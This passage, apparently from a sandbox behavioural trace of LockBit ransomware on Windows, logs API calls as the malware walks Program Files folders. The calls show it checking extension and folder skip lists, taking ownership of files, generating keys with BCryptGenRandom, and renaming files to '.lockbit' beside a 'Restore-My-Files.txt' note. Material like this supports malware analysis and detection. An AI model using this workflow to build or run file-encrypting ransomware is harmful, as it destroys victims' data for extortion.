Length=0x80, FileInformationClass=0xa) returned 0x0 [0076.916] free (_Block=0x77de70) [0076.916] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\rtstreamsource.ax" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0076.916] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0076.916] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.916] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd55c168a, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xd55c168a, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x18208, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecretST.TTF", cAlternateFileName="")) returned 1 [0076.916] lstrcmpiW (lpString1=".", lpString2="SecretST.TTF") returned -1 [0076.916] lstrcmpiW (lpString1="..", lpString2="SecretST.TTF") returned -1 [0076.916] PathFindExtensionW (pszPath="SecretST.TTF") returned=".TTF" [0076.916] lstrcmpiW (lpString1=".386", lpString2=".TTF") returned -1 [0076.916] lstrcmpiW (lpString1=".cmd", lpString2=".TTF") returned -1 [0076.916] lstrcmpiW (lpString1=".exe", lpString2=".TTF") returned -1 [0076.916] lstrcmpiW (lpString1=".ani", lpString2=".TTF") returned -1 [0076.916] lstrcmpiW (lpString1=".adv", lpString2=".TTF") returned -1 [0076.916] lstrcmpiW (lpString1=".theme", lpString2=".TTF") returned -1 [0076.916] lstrcmpiW (lpString1=".msi", lpString2=".TTF") returned -1 [0076.916] lstrcmpiW (lpString1=".msp", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".com", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".diagpkg", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".nls", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".diagcab", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".lock", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".ocx", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".mpa", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".cpl", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".mod", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".hta", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".icns", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".prf", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".rtp", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".diagcfg", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".msstyles", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".bin", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".hlp", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".shs", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".drv", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".wpx", lpString2=".TTF") returned 1 [0076.917] lstrcmpiW (lpString1=".bat", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".rom", lpString2=".TTF") returned -1 [0076.917] lstrcmpiW (lpString1=".msc", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".spl", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".ps1", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".msu", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".ics", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".key", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".mp3", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".reg", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".dll", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".ini", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".idx", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".sys", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".hlp", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".ico", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".lnk", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".rdp", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1=".lockbit", lpString2=".TTF") returned -1 [0076.918] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SecretST.TTF") returned -1 [0076.918] lstrcmpiW (lpString1="ntldr", lpString2="SecretST.TTF") returned -1 [0076.918] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SecretST.TTF") returned -1 [0076.918] lstrcmpiW (lpString1="bootsect.bak", lpString2="SecretST.TTF") returned -1 [0076.918] lstrcmpiW (lpString1="autorun.inf", lpString2="SecretST.TTF") returned -1 [0076.918] lstrcmpiW (lpString1="thumbs.db", lpString2="SecretST.TTF") returned 1 [0076.918] lstrcmpiW (lpString1="iconcache.db", lpString2="SecretST.TTF") returned -1 [0076.918] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0076.919] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\SecretST.TTF") returned=".TTF" [0076.919] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0076.919] lstrcmpiW (lpString1=".7z", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".ckp", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".dacpac", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".db", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".db-shm", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".db-wal", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".db3", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".dbc", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".dbs", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".dbt", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".dbv", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".frm", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".mdf", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".mrg", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".mwb", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".myd", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".ndf", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".qry", lpString2=".TTF") returned -1 [0076.919] lstrcmpiW (lpString1=".sdb", lpString2=".TTF") returned -1 [0076.920] lstrcmpiW (lpString1=".sdf", lpString2=".TTF") returned -1 [0076.920] lstrcmpiW (lpString1=".sql", lpString2=".TTF") returned -1 [0076.920] lstrcmpiW (lpString1=".sqlite", lpString2=".TTF") returned -1 [0076.920] lstrcmpiW (lpString1=".sqlite3", lpString2=".TTF") returned -1 [0076.920] lstrcmpiW (lpString1=".sqlitedb", lpString2=".TTF") returned -1 [0076.920] lstrcmpiW (lpString1=".tmd", lpString2=".TTF") returned -1 [0076.920] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\SecretST.TTF.lockbit") returned 48 [0076.920] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\SecretST.TTF" (normalized: "c:\\program files\\dvd maker\\secretst.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.920] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.921] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.921] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.921] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.921] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.921] RtlFreeAnsiString (AnsiString="\\") [0076.921] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x3a8) returned 0x0 [0076.921] malloc (_Size=0x200) returned 0x77d800 [0076.921] NtQueryInformationToken (in: TokenHandle=0x3a8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0076.921] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.922] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.922] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\SecretST.TTF", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.922] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\SecretST.TTF", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.922] CloseHandle (hObject=0x3a8) returned 1 [0076.922] free (_Block=0x77d800) [0076.922] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\SecretST.TTF" (normalized: "c:\\program files\\dvd maker\\secretst.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a8 [0076.923] CreateIoCompletionPort (FileHandle=0x3a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.923] malloc (_Size=0x40068) returned 0x2031ed0 [0076.924] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=98824) returned 1 [0076.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0076.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0076.925] ReadFile (in: hFile=0x3a8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0076.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\SecretST.TTF.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\SecretST.TTF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.936] malloc (_Size=0x76) returned 0x77d800 [0076.936] NtSetInformationFile (FileHandle=0x3a8, IoStatusBlock=0x3d6cf04, FileInformation=0x77d800, Length=0x76, FileInformationClass=0xa) returned 0x0 [0076.936] free (_Block=0x77d800) [0076.936] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\SecretST.TTF" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0076.936] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0076.936] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.936] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shared", cAlternateFileName="")) returned 1 [0076.937] lstrcmpiW (lpString1=".", lpString2="Shared") returned -1 [0076.937] lstrcmpiW (lpString1="..", lpString2="Shared") returned -1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="$windows.~bt") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="intel") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="msocache") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="$recycle.bin") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="$windows.~ws") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="tor browser") returned -1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="boot") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="system volume information") returned -1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="perflogs") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="google") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="application data") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="windows") returned -1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="windows.old") returned -1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="appdata") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="Windows nt") returned -1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="Msbuild") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="Microsoft") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="All users") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="mozilla") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="Microsoft.NET") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="microsoft shared") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="Internet Explorer") returned 1 [0076.937] lstrcmpiW (lpString1="Shared", lpString2="common files") returned 1 [0076.938] lstrcmpiW (lpString1="Shared", lpString2="opera") returned 1 [0076.938] lstrcmpiW (lpString1="Shared", lpString2="Windows Journal") returned -1 [0076.938] wsprintfW (in: param_1=0x3d6d178, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared") returned 34 [0076.938] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\*") returned 36 [0076.938] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6c970, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6c970) returned 0x55fdf8 [0076.946] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.946] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x523728, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.946] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0076.946] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.946] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dab239, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93dab239, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x68934cfd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x30e4, dwReserved0=0x523728, dwReserved1=0x0, cFileName="Common.fxh", cAlternateFileName="")) returned 1 [0076.946] lstrcmpiW (lpString1=".", lpString2="Common.fxh") returned -1 [0076.946] lstrcmpiW (lpString1="..", lpString2="Common.fxh") returned -1 [0076.946] PathFindExtensionW (pszPath="Common.fxh") returned=".fxh" [0076.946] lstrcmpiW (lpString1=".386", lpString2=".fxh") returned -1 [0076.946] lstrcmpiW (lpString1=".cmd", lpString2=".fxh") returned -1 [0076.946] lstrcmpiW (lpString1=".exe", lpString2=".fxh") returned -1 [0076.946] lstrcmpiW (lpString1=".ani", lpString2=".fxh") returned -1 [0076.947] lstrcmpiW (lpString1=".adv", lpString2=".fxh") returned -1 [0076.947] lstrcmpiW (lpString1=".theme", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".msi", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".msp", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".com", lpString2=".fxh") returned -1 [0076.947] lstrcmpiW (lpString1=".diagpkg", lpString2=".fxh") returned -1 [0076.947] lstrcmpiW (lpString1=".nls", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".diagcab", lpString2=".fxh") returned -1 [0076.947] lstrcmpiW (lpString1=".lock", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".ocx", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".mpa", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".cpl", lpString2=".fxh") returned -1 [0076.947] lstrcmpiW (lpString1=".mod", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".hta", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".icns", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".prf", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".rtp", lpString2=".fxh") returned 1 [0076.947] lstrcmpiW (lpString1=".diagcfg", lpString2=".fxh") returned -1 [0076.947] lstrcmpiW (lpString1=".msstyles", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".bin", lpString2=".fxh") returned -1 [0076.948] lstrcmpiW (lpString1=".hlp", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".shs", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".drv", lpString2=".fxh") returned -1 [0076.948] lstrcmpiW (lpString1=".wpx", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".bat", lpString2=".fxh") returned -1 [0076.948] lstrcmpiW (lpString1=".rom", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".msc", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".spl", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".ps1", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".msu", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".ics", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".key", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".mp3", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".reg", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".dll", lpString2=".fxh") returned -1 [0076.948] lstrcmpiW (lpString1=".ini", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".idx", lpString2=".fxh") returned 1 [0076.948] lstrcmpiW (lpString1=".sys", lpString2=".fxh") returned 1 [0076.949] lstrcmpiW (lpString1=".hlp", lpString2=".fxh") returned 1 [0076.949] lstrcmpiW (lpString1=".ico", lpString2=".fxh") returned 1 [0076.949] lstrcmpiW (lpString1=".lnk", lpString2=".fxh") returned 1 [0076.949] lstrcmpiW (lpString1=".rdp", lpString2=".fxh") returned 1 [0076.949] lstrcmpiW (lpString1=".lockbit", lpString2=".fxh") returned 1 [0076.949] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Common.fxh") returned 1 [0076.949] lstrcmpiW (lpString1="ntldr", lpString2="Common.fxh") returned 1 [0076.949] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Common.fxh") returned 1 [0076.949] lstrcmpiW (lpString1="bootsect.bak", lpString2="Common.fxh") returned -1 [0076.949] lstrcmpiW (lpString1="autorun.inf", lpString2="Common.fxh") returned -1 [0076.949] lstrcmpiW (lpString1="thumbs.db", lpString2="Common.fxh") returned 1 [0076.949] lstrcmpiW (lpString1="iconcache.db", lpString2="Common.fxh") returned 1 [0076.949] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\") returned="" [0076.949] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\Common.fxh") returned=".fxh" [0076.949] lstrcmpiW (lpString1=".rar", lpString2=".fxh") returned 1 [0076.949] lstrcmpiW (lpString1=".zip", lpString2=".fxh") returned 1 [0076.949] lstrcmpiW (lpString1=".7z", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".ckp", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".dacpac", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".db", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".db-shm", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".db-wal", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".db3", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".dbf", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".dbc", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".dbs", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".dbt", lpString2=".fxh") returned -1 [0076.949] lstrcmpiW (lpString1=".dbv", lpString2=".fxh") returned -1 [0076.950] lstrcmpiW (lpString1=".frm", lpString2=".fxh") returned -1 [0076.950] lstrcmpiW (lpString1=".mdf", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".mrg", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".mwb", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".myd", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".ndf", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".qry", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".sdb", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".sdf", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".sql", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".sqlite", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".sqlite3", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".sqlitedb", lpString2=".fxh") returned 1 [0076.950] lstrcmpiW (lpString1=".tmd", lpString2=".fxh") returned 1 [0076.950] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\Common.fxh.lockbit") returned 53 [0076.950] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Common.fxh" (normalized: "c:\\program files\\dvd maker\\shared\\common.fxh"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.950] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.951] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.951] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.951] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.951] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.951] RtlFreeAnsiString (AnsiString="\\") [0076.951] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6c530 | out: TokenHandle=0x3d6c530*=0x3b4) returned 0x0 [0076.951] malloc (_Size=0x200) returned 0x77d800 [0076.951] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6c528 | out: TokenInformation=0x77d800, ReturnLength=0x3d6c528) returned 0x0 [0076.951] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6c2e4, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.951] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6c2e4, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.951] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Common.fxh", SecurityInformation=0x1, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.952] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Common.fxh", SecurityInformation=0x4, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.952] CloseHandle (hObject=0x3b4) returned 1 [0076.952] free (_Block=0x77d800) [0076.952] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Common.fxh" (normalized: "c:\\program files\\dvd maker\\shared\\common.fxh"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0076.952] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.952] malloc (_Size=0x40068) returned 0x3d70048 [0076.953] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=12516) returned 1 [0076.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0076.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 